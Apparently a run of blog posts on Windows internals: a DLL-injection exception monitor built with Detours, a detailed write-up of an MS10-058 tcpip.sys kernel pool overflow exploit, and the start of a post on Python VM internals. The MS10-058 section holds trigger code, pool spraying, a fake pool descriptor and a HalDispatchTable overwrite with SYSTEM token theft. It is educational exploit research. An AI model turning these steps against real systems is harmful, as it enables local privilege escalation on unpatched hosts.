eax=00000000 ebx=7ffd3000 ecx=00000000 edx=01141267 esi=00000000 edi=00000000
eip=01141269 esp=0027fd50 ebp=0027fd58 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
divzero+0x1269:
001b:01141269 f7f0            div     eax,eax

kd> .trap
Resetting default scope

The idea now is to track the modification of the nt!_KTRAP_FRAME.Eip field as we discussed earlier (BTW, don't try to put directly a breakpoint on nt!KiDispatchException with VMware, it just blows my guest virtual machine) via a hardware-breakpoint:

kd> ba w4 esp+68

kd> g
Breakpoint 2 hit
nt!KiDispatchException+0x3d6:
846c559e c745fcfeffffff  mov     dword ptr [ebp-4],0FFFFFFFEh

kd> dt nt!_KTRAP_FRAME Eip @esi
    +0x068 Eip : 0x77b36448

kd> ln 0x77b36448
Exact matches:
    ntdll!KiUserExceptionDispatcher (<no parameter info>)

OK, so here we can clearly see the trap frame has been modified (keep in mind WinDbg gives you the control after the actual writing). That basically means that when the kernel will resume the execution via nt!KiExceptionExit (or nt!Kei386EoiHelper, two symbols for one same address) the CPU will directly execute the user mode exceptions dispatcher.

Great, I think we have now enough understanding to move on the second part of the article.

Serial Detourer

In this part we are going to talk about Detours, what looks like the API and how you can use it to build a userland exceptions sentinel without too many lines of codes. Here is the list of the features we want:

  • To hook ntdll!KiUserExceptionDispatcher: we will use Detours for that,
  • To generate a tiny readable exception report: for the disassembly part we will use Distorm (yet another easy cool library to use),
  • To focus x86 architecture: because unfortunately the express version doesn't work for x86_64.

Detours is going to modify the first bytes of the API you want to hook in order to redirect its execution in your piece of code: it's called an inline-hook.

detours.png
Detours can work in two modes:
  • A first mode where you don't touch to the binary you're going to hook, you will need a DLL module you will inject into your binary's memory. Then, Detours will modify in-memory the code of the APIs you will hook. That's what we are going to use.
  • A second mode where you modify the binary file itself, more precisely the IAT. In that mode, you won't need to have a DLL injecter. If you are interested in details about those tricks they described them in the Detours.chm file in the installation directory, read it!

So our sentinel will be divided in two main parts:

  • A program that will start the target binary and inject our DLL module (that's where all the important things are),
  • The sentinel DLL module that will hook the userland exceptions dispatcher and write the exception report.

The first one is really easy to implement using DetourCreateProcessWithDll: it's going to create the process and inject the DLL we want.

Usage: ./ProcessSpawner <full path dll> <path executable> <excutable name> [args..]

To successfully hook a function you have to know its address of course, and you have to implement the hook function. Then, you have to call DetourTransactionBegin, DetourUpdateThread, DetourTransactionCommit and you're done, wonderful isn't it ?

The only tricky thing, in our case, is that we want to hook ntdll!KiUserExceptionDispatcher, and that function has its own custom calling convention. Fortunately for us, in the samples directory of Detours you can find how you are supposed to deal with that specific case:

VOID __declspec(naked) NTAPI KiUserExceptionDispatcher(PEXCEPTION_RECORD ExceptionRecord, PCONTEXT Context)
{
    /* Taken from the Excep's detours sample */
    __asm
    {
        xor     eax, eax                ; // Create fake return address on stack.
        push    eax                     ; // (Generally, we are called by the kernel.)

        push    ebp                     ; // Prolog
        mov     ebp, esp                ;
        sub     esp, __LOCAL_SIZE       ;
    }

    EnterCriticalSection(&critical_section);
    log_exception(ExceptionRecord, Context);
    LeaveCriticalSection(&critical_section);

    __asm
    {
        mov     ebx, ExceptionRecord    ;
        mov     ecx, Context            ;
        push    ecx                     ;
        push    ebx                     ;
        mov     eax, [TrueKiUserExceptionDispatcher];
        jmp     eax                     ;
        //
        // The above code should never return.
        //
        int     3                       ; // Break!
        mov     esp, ebp                ; // Epilog
        pop     ebp                     ;
        ret                             ;
    }
}

Here is what looks ntdll!KiUserExceptionDispatcher like in memory after the hook:

hook.png
Disassembling some instructions pointed by the CONTEXT.Eip field is also really straightforward to do with distorm_decode:
if(IsBadReadPtr((const void*)Context->Eip, SIZE_BIGGEST_X86_INSTR * MAX_INSTRUCTIONS) == 0)
{
    _DecodeResult res;
    _OffsetType offset = Context->Eip;
    _DecodedInst decodedInstructions[MAX_INSTRUCTIONS] = {0};
    unsigned int decodedInstructionsCount = 0;

    res = distorm_decode(
        offset,
        (const unsigned char*)Context->Eip,
        MAX_INSTRUCTIONS * SIZE_BIGGEST_X86_INSTR,
        Decode32Bits,
        decodedInstructions,
        MAX_INSTRUCTIONS,
        &decodedInstructionsCount
    );

    if(res == DECRES_SUCCESS || res == DECRES_MEMORYERR)
    {
    fprintf(f, "\nDisassembly:\n");
    for(unsigned int i = 0; i < decodedInstructionsCount; ++i)
    {
        fprintf(
        f,
        "%.8I64x (%.2d) %-24s %s%s%s\n",
        decodedInstructions[i].offset,
        decodedInstructions[i].size,
        (char*)decodedInstructions[i].instructionHex.p,
        (char*)decodedInstructions[i].mnemonic.p,
        decodedInstructions[i].operands.length != 0 ? " " : "",
        (char*)decodedInstructions[i].operands.p
        );
    }
    }
}

So the prototype works pretty great like that.

D:\Codes\The Sentinel\Release>ProcessSpawner.exe "D:\Codes\The Sentinel\Release\ExceptionMonitorDll.dll" ..\tests\divzero.exe divzero.exe
D:\Codes\The Sentinel\Release>ls -l D:\Crashs\divzero.exe
total 4
-rw-rw-rw-  1 0vercl0k 0 863 2013-10-16 22:58 exceptionaddress_401359pid_2732tick_258597468timestamp_1381957116.txt

But once I've encountered a behavior that I didn't plan on: there was like a stack-corruption in a stack-frame protected by the /GS cookie. If the cookie has been, somehow, rewritten the program calls ___report_gs_failure (sometimes the implementation is directly inlined, thus you can find the definition of the function in your binary) in order to kill the program because the stack-frame is broken. Long story short, I was also hooking kernel32!UnhandleExceptionFilter to not miss that kind of exceptions, but I noticed while writing this post that it doesn't work anymore. We are going to see why in the next part.

The untold story: Win8 and nt!KiFastFailDispatch

Introduction

When I was writing this little post I did also some tests on my personal machine: a Windows 8 host. But the test for the /GS thing we just talked about wasn't working at all as I said. So I started my investigation by looking at the code of __report_gsfailure (generated with a VS2012) and I saw this:

void __usercall __report_gsfailure(unsigned int a1<ebx>, unsigned int a2<edi>, unsigned int a3<esi>, char a4)
{
    unsigned int v4; // eax@1
    unsigned int v5; // edx@1
    unsigned int v6; // ecx@1
    unsigned int v11; // [sp-4h] [bp-328h]@1
    unsigned int v12; // [sp+324h] [bp+0h]@0
    void *v13; // [sp+328h] [bp+4h]@3

    v4 = IsProcessorFeaturePresent(0x17u);
    // [...]
    if ( v4 )
    {
    v6 = 2;
    __asm { int     29h             ; DOS 2+ internal - FAST PUTCHAR }
    }
    [...]
    __raise_securityfailure(&GS_ExceptionPointers);
}

The first thing I asked myself was about that weird int 29h. Next thing I did was to download a fresh Windows 8 VM here and attached a kernel debugger in order to check the IDT entry 0x29:

kd> vertarget
Windows 8 Kernel Version 9200 MP (2 procs) Free x86 compatible
Built by: 9200.16424.x86fre.win8_gdr.120926-1855
Machine Name:
Kernel base = 0x8145c000 PsLoadedModuleList = 0x81647e68
Debug session time: Thu Oct 17 11:30:18.772 2013 (UTC + 2:00)
System Uptime: 0 days 0:02:55.784

kd> !idt 29

Dumping IDT: 809da400

29: 8158795c nt!KiRaiseSecurityCheckFailure

As opposed I was used to see on my Win7 machine:

kd> vertarget
Windows 7 Kernel Version 7600 MP (1 procs) Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 7600.16385.x86fre.win7_rtm.090713-1255
Machine Name:
Kernel base = 0x84646000 PsLoadedModuleList = 0x8478e810
Debug session time: Thu Oct 17 14:25:40.969 2013 (UTC + 2:00)
System Uptime: 0 days 0:00:55.203

kd> !idt 29

Dumping IDT: 80b95400

29: 00000000

I've opened my favorite IDE and I wrote a bit of code to test if there was a different behavior between Win7 and Win8 regarding this exception handling:

#include <stdio.h>
#include <windows.h>

int main()
{
    __try
    {
    __asm int 0x29
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
    printf("SEH catched the exception!\n");
    }
    return 0;
}

On Win7 I'm able to catch the exception via a SEH handler: it means the Windows kernel calls the user mode exception dispatcher for further processing by the user exception handlers (as we saw at the beginning of the post). But on Win8, at my surprise, I don't get the message ; the process is killed directly after displaying the usual message box "a program has stopped". Definitely weird.

What happens on Win7

When the interruption 0x29 is triggered by my code, the CPU is going to check if there is an IDT entry for that interruption, and if there isn't it's going to raise a #GP (nt!KiTrap0d) that will end up in nt!KiDispatchException.

And as previously, the function is going to check where the fault happened and because it happened in userland it will modify the trap frame structure to reach ntdll!KiUserExceptionDispatcher. That's why we can catch it in our __except scope.

kd> r
eax=0000000d ebx=86236d40 ecx=862b48f0 edx=0050e600 esi=00000000 edi=0029b39f
eip=848652dd esp=9637fd34 ebp=9637fd34 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
nt!KiTrap0D+0x471:
848652dd e80ddeffff      call    nt!CommonDispatchException+0x123 (848630ef)

kd> k 2
ChildEBP RetAddr  
9637fd34 0029b39f nt!KiTrap0D+0x471
0016fc1c 0029be4c gs+0x2b39f

kd> u gs+0x2b39f l1
gs+0x2b39f:
0029b39f cd29            int     29h

What happens on Win8

This time the kernel has defined an ISR for the interruption 0x29: nt!KiRaiseSecurityCheckFailure. This function is going to call nt!KiFastFailDispatch, and this one is going to call nt!KiDispatchException:

kifastfaildispatch.png
BUT the exception is going to be processed as a second-chance exception because of the way nt!KiFastFailDispatch calls the kernel mode exception dispatcher. And if we look at the source of nt!KiDispatchException in ReactOS we can see that this exception won't have the chance to reach back the userland as in Win7 :)):
VOID
NTAPI
KiDispatchException(IN PEXCEPTION_RECORD ExceptionRecord,
                    IN PKEXCEPTION_FRAME ExceptionFrame,
                    IN PKTRAP_FRAME TrapFrame,
                    IN KPROCESSOR_MODE PreviousMode,
                    IN BOOLEAN FirstChance)
{
    CONTEXT Context;
    EXCEPTION_RECORD LocalExceptRecord;

// [...]
    /* Handle kernel-mode first, it's simpler */
    if (PreviousMode == KernelMode)
    {
// [...]
    }
    else
    {
        /* User mode exception, was it first-chance? */
        if (FirstChance)
        {
// [...]
// that's in this branch the kernel reaches back to the user mode exception dispatcher
// but if FirstChance=0, we won't have that chance

            /* Set EIP to the User-mode Dispatcher */
            TrapFrame->Eip = (ULONG)KeUserExceptionDispatcher;

            /* Dispatch exception to user-mode */
            _SEH2_YIELD(return);
        }

        /* Try second chance */
        if (DbgkForwardException(ExceptionRecord, TRUE, TRUE))
        {
            /* Handled, get out */
            return;
        }
        else if (DbgkForwardException(ExceptionRecord, FALSE, TRUE))
        {
            /* Handled, get out */
            return;
        }
// [...]
    return;
}

To convince yourself you can even modify the FirstChance argument passed to nt!KiDispatchException from nt!KiFastFailDispatch. You will see the SEH handler is called like in Win7:

win8.png
Cool, we have now our answer to the weird behavior! I guess if you want to monitor /GS exception you are going to find another trick :)).

Conclusion

I hope you enjoyed this little trip in the Windows' exception world both in user and kernel mode. You will find the seems-to-be-working PoC on my github account here: The sentinel. By the way, you are highly encouraged to improve it, or to modify it in order to suit your use-case!

If you liked the subject of the post, I've made a list of really cool/interesting links you should check out:

High five to my friend @Ivanlef0u for helping me to troubleshoot the weird behavior, and @__x86 for the review!

First dip into the kernel pool : MS10-058

Introduction

I am currently playing with pool-based memory corruption vulnerabilities. That’s why I wanted to program a PoC exploit for the vulnerability presented by Tarjei Mandt during his first talk “Kernel Pool Exploitation on Windows 7” [3]. I think it's a good exercise to start learning about pool overflows.

Forewords

If you want to experiment with this vulnerability, you should read [1] and be sure to have a vulnerable system. I tested my exploit on a VM with Windows 7 32 bits with tcpip.sys 6.1.7600.16385. The Microsoft bulletin dealing with this vulnerability is MS10-058. It has been found by Matthieu Suiche [2] and was used as an example on Tarjei Mandt’s paper [3].

Triggering the flaw

An integer overflow in tcpip!IppSortDestinationAddresses allows to allocate a wrong-sized non-paged pool memory chunk. Below you can see the diff between the vulnerable version and the patched version.

diff.png

So basically the flaw is merely an integer overflow that triggers a pool overflow.

IppSortDestinationAddresses(x,x,x)+29   imul    eax, 1Ch
IppSortDestinationAddresses(x,x,x)+2C   push    esi
IppSortDestinationAddresses(x,x,x)+2D   mov     esi, ds:__imp__ExAllocatePoolWithTag@12 
IppSortDestinationAddresses(x,x,x)+33   push    edi
IppSortDestinationAddresses(x,x,x)+34   mov     edi, 73617049h
IppSortDestinationAddresses(x,x,x)+39   push    edi   
IppSortDestinationAddresses(x,x,x)+3A   push    eax  
IppSortDestinationAddresses(x,x,x)+3B   push    ebx           
IppSortDestinationAddresses(x,x,x)+3C   call    esi ; ExAllocatePoolWithTag(x,x,x)

You can reach this code using a WSAIoctl with the code SIO_ADDRESS_LIST_SORT using a call like this :

WSAIoctl(sock, SIO_ADDRESS_LIST_SORT, pwn, 0x1000, pwn, 0x1000, &cb, NULL, NULL)

You have to pass the function a pointer to a SOCKET_ADDRESS_LIST (pwn in the example). This SOCKET_ADDRESS_LIST contains an iAddressCount field and iAddressCount SOCKET_ADDRESS structures. With a high iAddressCount value, the integer will wrap, thus triggering the wrong-sized allocation. We can almost write anything in those structures. There are only two limitations :

IppFlattenAddressList(x,x)+25   lea     ecx, [ecx+ebx*8]
IppFlattenAddressList(x,x)+28   cmp     dword ptr [ecx+8], 1Ch
IppFlattenAddressList(x,x)+2C   jz      short loc_4DCA9

IppFlattenAddressList(x,x)+9C   cmp     word ptr [edx], 17h
IppFlattenAddressList(x,x)+A0   jnz     short loc_4DCA2

The copy will stop if those checks fail. That means that each SOCKET_ADDRESS has a length of 0x1c and that each SOCKADDR buffer pointed to by the socket address begins with a 0x17 byte. Long story short :

  • Make the multiplication at IppSortDestinationAddresses+29 overflow
  • Get a non-paged pool chunk at IppSortDestinationAddresses+3e that is too little
  • Write user controlled memory to this chunk in IppFlattenAddressList+67 and overflow as much as you want (provided that you take care of the 0x1c and 0x17 bytes)

The code below should trigger a BSOD. Now the objective is to place an object after our vulnerable object and modify pool metadata.

WSADATA wd = {0};
SOCKET sock = 0;
SOCKET_ADDRESS_LIST *pwn = (SOCKET_ADDRESS_LIST*)malloc(sizeof(INT) + 4 * sizeof(SOCKET_ADDRESS));
DWORD cb;

memset(buffer,0x41,0x1c);
buffer[0] = 0x17;
buffer[1] = 0x00;
sa.lpSockaddr = (LPSOCKADDR)buffer;
sa.iSockaddrLength = 0x1c;
pwn->iAddressCount = 0x40000003;
memcpy(&pwn->Address[0],&sa,sizeof(_SOCKET_ADDRESS));
memcpy(&pwn->Address[1],&sa,sizeof(_SOCKET_ADDRESS));
memcpy(&pwn->Address[2],&sa,sizeof(_SOCKET_ADDRESS));
memcpy(&pwn->Address[3],&sa,sizeof(_SOCKET_ADDRESS));

WSAStartup(MAKEWORD(2,0), &wd)
sock = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
WSAIoctl(sock, SIO_ADDRESS_LIST_SORT, pwn, 0x1000, pwn, 0x1000, &cb, NULL, NULL)

Spraying the pool

Non paged objects

There are several objects that we could easily use to manipulate the non-paged pool. For instance we could use semaphore objects or reserve objects.

*8516b848 size:   48 previous size:   48  (Allocated) Sema 
*85242d08 size:   68 previous size:   68  (Allocated) User 
*850fcea8 size:   60 previous size:    8  (Allocated) IoCo

We are trying to overflow a pool chunk with a size being a multiple of 0x1c. As 0x1c*3=0x54, the driver is going to request 0x54 bytes and being therefore given a chunk of 0x60 bytes. This is exactly the size of an I/O completion reserve object. To allocate a IoCo, we just need to call NtAllocateReserveObject with the object type IOCO. To deallocate the IoCo, we could simply close the associate the handle. Doing this would make the object manager release the object. For more in-depth information about reserve objects, you can read j00ru’s article [4].

In order to spray, we are first going to allocate a lot of IoCo without releasing them so as to fill existing holes in the pool. After that, we want to allocate IoCo and make holes of 0x60 bytes. This is illustrated in the sprayIoCo() function of my PoC. Now we are able have an IoCo pool chunk following an Ipas pool chunk (as you might have noticed, ‘Ipas’ is the tag used by the tcpip driver). Therefore, we can easily corrupt its pool header.

nt!PoolHitTag

If you want to debug a specific call to ExFreePoolWithTag and simply break on it you’ll see that there are way too much frees (and above all, this is very slow when kernel debugging). A simple approach to circumvent this issue is to use pool hit tags.

ExFreePoolWithTag(x,x)+62F                  and     ecx, 7FFFFFFFh
ExFreePoolWithTag(x,x)+635                  mov     eax, ebx
ExFreePoolWithTag(x,x)+637                  mov     ebx, ecx
ExFreePoolWithTag(x,x)+639                  shl     eax, 3
ExFreePoolWithTag(x,x)+63C                  mov     [esp+58h+var_28], eax
ExFreePoolWithTag(x,x)+640                  mov     [esp+58h+var_2C], ebx
ExFreePoolWithTag(x,x)+644                  cmp     ebx, _PoolHitTag
ExFreePoolWithTag(x,x)+64A                  jnz     short loc_5180E9
ExFreePoolWithTag(x,x)+64C                  int     3               ; Trap to Debugger

As you can see on the listing above, nt!PoolHitTag is compared against the pool tag of the currently freed chunk. Notice the mask : it allows you to use the raw tag. (for instance ‘oooo’ instead of 0xef6f6f6f) By the way, you are not required to use the genuine tag. (eg : you can use ‘ooo’ for ‘IoCo’) Now you know that you can ed nt!PoolHitTag ‘oooo’ to debug your exploit.

Exploitation technique

Basic structure

As the internals of the pool are thoroughly detailed in Tarjei Mandt’s paper [3], I will only be giving a glimpse at the pool descriptor and the pool header structures. The pool memory is divided into several types of pool. Two of them are the paged pool and the non-paged pool. A pool is described by a _POOL_DESCRIPTOR structure as seen below.

0: kd> dt _POOL_TYPE
ntdll!_POOL_TYPE
   NonPagedPool = 0n0
   PagedPool = 0n1
0: kd> dt _POOL_DESCRIPTOR
nt!_POOL_DESCRIPTOR
   +0x000 PoolType         : _POOL_TYPE
   +0x004 PagedLock        : _KGUARDED_MUTEX
   +0x004 NonPagedLock     : Uint4B
   +0x040 RunningAllocs    : Int4B
   +0x044 RunningDeAllocs  : Int4B
   +0x048 TotalBigPages    : Int4B
   +0x04c ThreadsProcessingDeferrals : Int4B
   +0x050 TotalBytes       : Uint4B
   +0x080 PoolIndex        : Uint4B
   +0x0c0 TotalPages       : Int4B
   +0x100 PendingFrees     : Ptr32 Ptr32 Void
   +0x104 PendingFreeDepth : Int4B
   +0x140 ListHeads        : [512] _LIST_ENTRY

A pool descriptor references free memory in a free list called ListHeads. The PendingFrees field references chunks of memory waiting to be freed to the free list. Pointers to pool descriptor structures are stored in arrays such as PoolVector (non-paged) or ExpPagedPoolDescriptor (paged). Each chunk of memory contains a header before the actual data. This is the _POOL_HEADER. It brings information such as the size of the block or the pool it belongs to.

0: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 9 Bits
   +0x000 PoolIndex        : Pos 9, 7 Bits
   +0x002 BlockSize        : Pos 0, 9 Bits
   +0x002 PoolType         : Pos 9, 7 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x004 AllocatorBackTraceIndex : Uint2B
   +0x006 PoolTagHash      : Uint2B

PoolIndex overwrite

The basic idea of this attack is to corrupt the PoolIndex field of a pool header. This field is used when deallocating paged pool chunks in order to know which pool descriptor it belongs to. It is used as an index in an array of pointers to pool descriptors. Thus, if an attacker is able to corrupt it, he can make the pool manager believe that a specific chunk belongs to another pool descriptor. For instance, one could reference a pool descriptor out of the bounds of the array.

0: kd> dd ExpPagedPoolDescriptor
82947ae0  84835000 84836140 84837280 848383c0
82947af0  84839500 00000000 00000000 00000000

As there are always some null pointers after the array, it could be used to craft a fake pool descriptor in a user-allocated null page.

Non paged pool type

To determine the _POOL_DESCRIPTOR to use, ExFreePoolWithTag gets the appropriate _POOL_HEADER and stores PoolType (watchMe) and BlockSize (var_3c)

ExFreePoolWithTag(x,x)+465
ExFreePoolWithTag(x,x)+465  loc_517F01:
ExFreePoolWithTag(x,x)+465  mov     edi, esi
ExFreePoolWithTag(x,x)+467  movzx   ecx, word ptr [edi-6]
ExFreePoolWithTag(x,x)+46B  add     edi, 0FFFFFFF8h
ExFreePoolWithTag(x,x)+46E  movzx   eax, cx
ExFreePoolWithTag(x,x)+471  mov     ebx, eax
ExFreePoolWithTag(x,x)+473  shr     eax, 9
ExFreePoolWithTag(x,x)+476  mov     esi, 1FFh
ExFreePoolWithTag(x,x)+47B  and     ebx, esi
ExFreePoolWithTag(x,x)+47D  mov     [esp+58h+var_40], eax
ExFreePoolWithTag(x,x)+481  and     eax, 1
ExFreePoolWithTag(x,x)+484  mov     edx, 400h
ExFreePoolWithTag(x,x)+489  mov     [esp+58h+var_3C], ebx
ExFreePoolWithTag(x,x)+48D  mov     [esp+58h+watchMe], eax
ExFreePoolWithTag(x,x)+491  test    edx, ecx
ExFreePoolWithTag(x,x)+493  jnz     short loc_517F49

Later, if ExpNumberOfNonPagedPools equals 1, the correct pool descriptor will directly be taken from nt!PoolVector[0]. The PoolIndex is not used.

ExFreePoolWithTag(x,x)+5C8  loc_518064:
ExFreePoolWithTag(x,x)+5C8  mov     eax, [esp+58h+watchMe]
ExFreePoolWithTag(x,x)+5CC  mov     edx, _PoolVector[eax*4]
ExFreePoolWithTag(x,x)+5D3  mov     [esp+58h+var_48], edx
ExFreePoolWithTag(x,x)+5D7  mov     edx, [esp+58h+var_40]
ExFreePoolWithTag(x,x)+5DB  and     edx, 20h
ExFreePoolWithTag(x,x)+5DE  mov     [esp+58h+var_20], edx
ExFreePoolWithTag(x,x)+5E2  jz      short loc_5180B6


ExFreePoolWithTag(x,x)+5E8  loc_518084:
ExFreePoolWithTag(x,x)+5E8  cmp     _ExpNumberOfNonPagedPools, 1
ExFreePoolWithTag(x,x)+5EF  jbe     short loc_5180CB

ExFreePoolWithTag(x,x)+5F1  movzx   eax, word ptr [edi]
ExFreePoolWithTag(x,x)+5F4  shr     eax, 9
ExFreePoolWithTag(x,x)+5F7  mov     eax, _ExpNonPagedPoolDescriptor[eax*4]
ExFreePoolWithTag(x,x)+5FE  jmp     short loc_5180C7

Therefore, you have to make the pool manager believe that the chunk is located in paged memory.

Crafting a fake pool descriptor

As we want a fake pool descriptor at null address. We just allocate this page and put a fake deferred free list and a fake ListHeads.

When freeing a chunk, if the deferred freelist contains at least 0x20 entries, ExFreePoolWithTag is going to actually free those chunks and put them on the appropriate entries of the ListHeads.

*(PCHAR*)0x100 = (PCHAR)0x1208; 
*(PCHAR*)0x104 = (PCHAR)0x20;
for (i = 0x140; i < 0x1140; i += 8) {
    *(PCHAR*)i = (PCHAR)WriteAddress-4;
}
*(PINT)0x1200 = (INT)0x060c0a00;
*(PINT)0x1204 = (INT)0x6f6f6f6f;
*(PCHAR*)0x1208 = (PCHAR)0x0;
*(PINT)0x1260 = (INT)0x060c0a0c;
*(PINT)0x1264 = (INT)0x6f6f6f6f;

Notes

It is interesting to note that this attack would not work with modern mitigations. Here are a few reasons :

  • Validation of the PoolIndex field
  • Prevention of the null page allocation
  • NonPagedPoolNX has been introduced with Windows 8 and should be used instead of the NonPagedPool type.
  • SMAP would prevent access to userland data
  • SMEP would prevent execution of userland code

Payload and clean-up

A classical target for write-what-where scenarios is the HalDispatchTable. We just have to overwrite HalDispatchTable+4 with a pointer to our payload which is setupPayload(). When we are done, we just have to put back the pointer to hal!HaliQuerySystemInformation. (otherwise you can expect some crashes)

Now that we are able to execute arbitrary code from kernel land we just have to get the _EPROCESS of the attacking process with PsGetCurrentProcess() and walk the list of processes using the ActiveProcessLinks field until we encounter a process with ImageFileName equal to “System”. Then we just replace the access token of the attacker process by the one of the system process. Note that the lazy author of this exploit hardcoded several offsets :).

This is illustrated in payload().

screenshot.png

Greetings

Special thanks to my friend @0vercl0k for his review and help!

Conclusion

I hope you enjoyed this article. If you want to know more about the topic, check out the latest papers of Tarjei Mandt, Zhenhua Liu and Nikita Tarakanov. (or wait for other articles ;) )

You can find my code on my new github [5]. Don’t hesitate to share comments on my article or my exploit if you see something wrong :)

References

[1] Vulnerability details on itsecdb

[2] MS bulletin

[3] Kernel Pool Exploitation on Windows 7 - Tarjei Mandt's paper. A must-read!

[4] Reserve Objects in Windows 7 - Great j00ru's article!

[5] The code of my exploit for MS10-058

Deep dive into Python's VM: Story of LOAD_CONST bug

Introduction

A year ago, I've written a Python script to leverage a bug in Python's virtual machine: the idea was to fully control the Python virtual processor and after that to instrument the VM to execute native codes. The python27_abuse_vm_to_execute_x86_code.py script wasn't really self-explanatory, so I believe only a few people actually took some time to understood what happened under the hood. The purpose of this post is to give you an explanation of the bug, how you can control the VM and how you can turn the bug into something that can be more useful. It's also a cool occasion to see how works the Python virtual machine from a low-level perspective: what we love so much right?

But before going further, I just would like to clarify a couple of things:

  • I haven't found this bug, this is quite old and known by the Python developers (trading safety for performance), so don't panic this is not a 0day or a new bug ; can be a cool CTF trick though
  • Obviously, YES I know we can also "escape" the virtual machine with the ctypes module ; but this is a feature not a bug. In addition, ctypes is always "removed" from sandbox implementation in Python

Also, keep in mind I will focus Python 2.7.5 x86 on Windows ; but obviously this is adaptable for other systems and architectures, so this is left as an exercise to the interested readers. All right, let's move on to the first part: this one will focus the essentials about the VM, and Python objects.

The Python virtual processor

Introduction

As you know, Python is a (really cool) scripting language interpreted, and the source of the official interpreter is available here: Python-2.7.6.tgz. The project is written in C, and it is really readable ; so please download the sources, read them, you will learn a lot of things. Now all the Python code you write is being compiled, at some point, into some "bytecodes": let's say it's exactly the same when your C codes are compiled into x86 code. But the cool thing for us, is that the Python architecture is far more simpler than x86.

Here is a partial list of all available opcodes in Python 2.7.5:

In [5]: len(opcode.opmap.keys())
Out[5]: 119
In [4]: opcode.opmap.keys()
Out[4]: [
  'CALL_FUNCTION',
  'DUP_TOP',
  'INPLACE_FLOOR_DIVIDE',
  'MAP_ADD',
  'BINARY_XOR',
  'END_FINALLY',
  'RETURN_VALUE',
  'POP_BLOCK',
  'SETUP_LOOP',
  'BUILD_SET',
  'POP_TOP',
  'EXTENDED_ARG',
  'SETUP_FINALLY',
  'INPLACE_TRUE_DIVIDE',
  'CALL_FUNCTION_KW',
  'INPLACE_AND',
  'SETUP_EXCEPT',
  'STORE_NAME',
  'IMPORT_NAME',
  'LOAD_GLOBAL',
  'LOAD_NAME',
  ...
]

The virtual machine

The Python VM is fully implemented in the function PyEval_EvalFrameEx that you can find in the ceval.c file. The machine is built with a simple loop handling opcodes one-by-one with a bunch of switch-cases:

PyObject *
PyEval_EvalFrameEx(PyFrameObject *f, int throwflag)
{
  //...
  fast_next_opcode:
  //...
  /* Extract opcode and argument */
  opcode = NEXTOP();
  oparg = 0;
  if (HAS_ARG(opcode))
    oparg = NEXTARG();
  //...
  switch (opcode)
  {
    case NOP:
      goto fast_next_opcode;

    case LOAD_FAST:
      x = GETLOCAL(oparg);
      if (x != NULL) {
        Py_INCREF(x);
        PUSH(x);
        goto fast_next_opcode;
      }
      format_exc_check_arg(PyExc_UnboundLocalError,
        UNBOUNDLOCAL_ERROR_MSG,
        PyTuple_GetItem(co->co_varnames, oparg));
      break;

    case LOAD_CONST:
      x = GETITEM(consts, oparg);
      Py_INCREF(x);
      PUSH(x);
      goto fast_next_opcode;

    case STORE_FAST:
      v = POP();
      SETLOCAL(oparg, v);
      goto fast_next_opcode;

    //...
  }

The machine also uses a virtual stack to pass/return object to the different opcodes. So it really looks like an architecture we are used to dealing with, nothing exotic.

Everything is an object

The first rule of the VM is that it handles only Python objects. A Python object is basically made of two parts:

  • The first one is a header, this header is mandatory for all the objects. Defined like that:
#define PyObject_HEAD                   \
  _PyObject_HEAD_EXTRA                \
  Py_ssize_t ob_refcnt;               \
  struct _typeobject *ob_type;

#define PyObject_VAR_HEAD               \
  PyObject_HEAD                       \
  Py_ssize_t ob_size; /* Number of items in variable part */
  • The second one is the variable part that describes the specifics of your object. Here is for example PyStringObject:
typedef struct {
  PyObject_VAR_HEAD
  long ob_shash;
  int ob_sstate;
  char ob_sval[1];

  /* Invariants:
    *     ob_sval contains space for 'ob_size+1' elements.
    *     ob_sval[ob_size] == 0.
    *     ob_shash is the hash of the string or -1 if not computed yet.
    *     ob_sstate != 0 iff the string object is in stringobject.c's
    *       'interned' dictionary; in this case the two references
    *       from 'interned' to this object are *not counted* in ob_refcnt.
    */
} PyStringObject;

Now, some of you may ask themselves "How does Python know the type of an object when it receives a pointer ?". In fact, this is exactly the role of the field ob_type. Python exports a _typeobject static variable that describes the type of the object. Here is, for instance the PyString_Type:

PyTypeObject PyString_Type = {
  PyVarObject_HEAD_INIT(&PyType_Type, 0)
  "str",
  PyStringObject_SIZE,
  sizeof(char),
  string_dealloc,                             /* tp_dealloc */
  (printfunc)string_print,                    /* tp_print */
  0,                                          /* tp_getattr */
  // ...
};

Basically, every string objects will have their ob_type fields pointing to that PyString_Type variable. With this cute little trick, Python is able to do type checking like that:

#define Py_TYPE(ob)             (((PyObject*)(ob))->ob_type)
#define PyType_HasFeature(t,f)  (((t)->tp_flags & (f)) != 0)
#define PyType_FastSubclass(t,f)  PyType_HasFeature(t,f)

#define PyString_Check(op) \
  PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_STRING_SUBCLASS)

#define PyString_CheckExact(op) (Py_TYPE(op) == &PyString_Type)

With the previous tricks, and the PyObject type defined as follow, Python is able to handle in a generic-fashion the different objects:

typedef struct _object {
  PyObject_HEAD
} PyObject;

So when you are in your debugger and you want to know what type of object it is, you can use that field to identify easily the type of the object you are dealing with:

0:000> dps 026233b0 l2
026233b0  00000001
026233b4  1e226798 python27!PyString_Type

Once you have done that, you can dump the variable part describing your object to extract the information you want. By the way, all the native objects are implemented in the Objects/ directory.

Debugging session: stepping the VM. The hard way.

It's time for us to go a little bit deeper, at the assembly level, where we belong ; so let's define a dummy function like this one:

def a(b, c):
  return b + c

Now using the Python's dis module, we can disassemble the function object a:

In [20]: dis.dis(a)
2   0 LOAD_FAST                0 (b)
    3 LOAD_FAST                1 (c)
    6 BINARY_ADD
    7 RETURN_VALUE
In [21]: a.func_code.co_code
In [22]: print ''.join('\\x%.2x' % ord(i) for i in a.__code__.co_code)
\x7c\x00\x00\x7c\x01\x00\x17\x53

In [23]: opcode.opname[0x7c]
Out[23]: 'LOAD_FAST'
In [24]: opcode.opname[0x17]
